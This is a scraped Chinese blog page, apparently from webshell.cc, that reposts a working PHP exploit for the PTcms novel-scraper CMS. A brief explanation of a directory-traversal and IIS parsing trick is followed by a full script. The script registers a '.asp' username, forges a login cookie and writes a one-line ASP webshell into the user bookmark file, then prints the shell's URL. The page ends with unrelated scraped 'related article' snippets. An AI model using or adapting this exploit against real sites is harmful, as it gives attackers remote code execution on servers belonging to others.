于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏哪里插入一句话,

对应的木马地址是

https://www.webshell.cc/1.asp/mark.ptv

ps://针对解析漏洞的 鸡肋

下面放出落叶的exp 怕在下面大家看不到哈。

//error_reporting(0);

print_r('

+---------------------------------------------------------------------------+

PTcms Code written Exploit

by:cfking@90sec.org

welcome to [url]www.90sec.org[/url]

+---------------------------------------------------------------------------+

'

);

if($argv[1]==null){

print_r('

Usage: php '.$argv[0].' url

Example:

php '.$argv[0].' [url]www.site.com[/url]

');

;exit;

}

$url=$argv[1];

$user=substr(md5(time()),0,10).".asp";

$settime=date("Y-m-d",time());

$to=postzend($url,"username=$user&password=hacker&chk_password=hacker&dosubmit=%CF%C2%D2%BB%B2%BD");

if($to!==null){

postzend($url,"comeurl=http%3A%2F%2Fwww.cscity.net%2Fuser%2Findex.php&username=$to&password=hacker&cookietime=31536000&dosubmit=%CC%E1+%BD%BB",'login','/user/logchk.php');

$cookie="logtime=$settime; logip=110.110.110.110; pt_userlv=%B7%B2%C8%CB; pt_userpmnum=0; pt_username=$to";

postzend($url,'1=%3C%25execute+request%28chr%2835%29%29%25%3E&dochange=%D0%DE+%B8%C4','exploit','/user/mark.php',$cookie);

}

function postzend($url,$content,$type='reg',$path='/user/reg.php?step=3',$cookie='ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON'){

global $user;

$host=$url;

$port="80";

$data = "POST $path HTTP/1.1\r\n";

$data .= "Host: ".$host."\r\n";

$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";

$data .= "Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\n";

$data .= "Referer: http://$host/user/reg.php?step=2\r\n";

$data .= "Cookie: $cookie\r\n";

$data .= "Connection: keep-alive\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

$ock=fsockopen($host,$port);

if (!$ock) {

echo "[-] No response from $host \n";

die;

}

fwrite($ock,$data);

while (!feof($ock)) {

$exp .=fgets($ock, 1024);

}

if($type=='reg'){

$tag="注册成功";$msg="Reg Successful\n[-] shellpath [-] \nhttp://$host/data/user/$user/mark.ptv";

}

if($type=='login'){$tag="登录成功";$msg="Login Successful";}

preg_match("/

(.*?)
/", $exp, $arr);

$result=explode(",",$arr[1]);

if($result[0]=="$tag"){

echo "[*] $msg \n";

return $user;

}else{

preg_match("/

(.*?)
/", $exp, $arrs);

if(is_array($arrs)){

echo "[*] Exploit Successful\n";

echo "[*] The pass # \n";

}else{

echo "[-] Exploit Failed\n";

}

return false;

exit;

}

}

?>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3108.html

php小偷cookie,ptcms小说小偷程序 最新EXP漏洞相关推荐

  1. 好用的小说小偷程序php,ptcms小说小偷程序最新漏洞

    于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹, 那么我们注册../../1.asp; 或者../../2.asp 然后在书架或者收藏哪里插入一句话, 对应的木马地址是 http:/ ...

  2. 下载的小说是php,冷迪小说全自动采集程序php版(原名:冷迪小说小偷) v2.0

    冷迪小说全自动采集程序php版(原名:冷迪小说小偷) v2.0 程序作者:medias 冷迪中文网 www.lengdi.com 冷迪小说全自动采集程序php版 v2.0 的重大改进: 1.调整了刷新 ...

  3. PTCms小说系统自动在线采集修正版+手机

    介绍: PTCms小说系统自动在线采集修正版,小说聚合网站带手机端,4套模板,在线听书和TXT下载 1.安装前的准备工作 将程序上传到网站根目录下,不要在二级目录下调试,请勿删除根目录下的bbs.## ...

  4. 微信小程序最新开发资源汇总,对学习微信小程序的新手有一定帮助

    微信小程序最新开发资源汇总,希望给想学习或正在学习微信小程序开发的同学们带来一定帮助,汇总的小程序资源有点繁杂,各种类型的小程序demo都有,大家可以选择自己想要的demo进行下载学习.这些微信小程序 ...

  5. 基于PHP+小程序(MINA框架)+Mysql数据库的小说小程序系统设计与实现

    项目背景和意义 目的:本课题主要目标是设计并能够实现一个基于微信小程序的在线免费小说平台,前台用户使用小程序,后台管理使用基PHP+MySql的B/S架构:管理员通过后台录入作者信息,发布资讯,管理会 ...

  6. php网站套模板教程,PTCMS小说网站全新版源码+内附4套精美模板+教程

    源码介绍: 最新PTCMS小说精美多风格四套全新版源码+模板内附详细的安装教程,亲测完美搭建. 安装教程 安装宝塔面板一键安装环境 宝塔:www.bt.cn 必装环境:nginx(apache.iis ...

  7. 稳扎稳打Silverlight(29) - 2.0Tip/Trick之Cookie, 自定义字体, 为程序传递参数, 自定义鼠标右键...

    [索引页] [源码下载] 稳扎稳打Silverlight(29) - 2.0Tip/Trick之Cookie, 自定义字体, 为程序传递参数, 自定义鼠标右键, 程序常用配置参数 作者:webabcd ...

  8. 单片机编程php,STC单片机内部FLASH读写程序(最新整理)

    <STC单片机内部FLASH读写程序(最新整理)>由会员分享,可在线阅读,更多相关<STC单片机内部FLASH读写程序(最新整理)(6页珍藏版)>请在人人文库网上搜索. 1.S ...

  9. 微信小程序最新获取头像以及昵称方法

    微信小程序最新获取头像信息 之前是使用open-dada获取微信头像和昵称,但是后面由于官网更新,此方法被收回了,所以不能使用此方法了. 之前方法代码: <open-data type=&quo ...

最新文章

  1. 从数据集到2D和3D方法,一文概览目标检测领域进展
  2. IC/FPGA笔试/面试题分析(十一)基础概念(三态门等)
  3. metasploit msfconsole 命令参数
  4. 【转】C# 中Linq查询所有上级节点或所有下级节点
  5. 华为手表用鸿蒙了吗,华为鸿蒙都2.0了,手机还不能用吗?
  6. 前凸后翘的步进电机调速算法~
  7. 一个问题就可以辨别真假NLP(自然语言处理)研究者
  8. 数据线给电脑联网是什么原理_物联网孵化的产物——条码扫描器
  9. 红外倒车雷达原理图_自动驾驶汽车传感器技术解析—毫米波雷达
  10. 一图胜千言,8 张图理解 Java
  11. RabbitMQ学习笔记(二) 工作队列
  12. 吓skr人!BATJ六大男神来了,还说......
  13. 使用maven打包bootdo并运行
  14. nrf52840 spi 32MHz配置
  15. 思维导图 XMind 闯关之路(第05关)插入外框概要
  16. 学习日记20160915
  17. Jenkins(09):发送邮件时,修改发件人名称
  18. 宝宝喜欢爬窗户怎么办?
  19. CSS学习(五)—— 背景与渐变、2D与3D的转换
  20. document.getElementById详解

热门文章

  1. Population and carrying capacity 的第三个阶段:Crowding affects births
  2. html视频怎么转换成图片,WPS演示如何将图片转换成视频?
  3. 又一款简洁实用的个人博客系统
  4. 使用python3.7.2 实现大名鼎鼎的Elo Score等级分制度 CSGO段位机制
  5. BIOS设置nbsp;翻译中文图文教程(一)
  6. antd表格显示分页怎么取消_新买手机号码打电话显示骚扰推销怎么解除取消?...
  7. plc c语言 软元件t,三菱PLC软元件的种类及功能大全
  8. OCRM与ACRM的区别
  9. post请求路径出错NET:ERR_CONNECTION_RESET
  10. 解析展望激光雷达——自动驾驶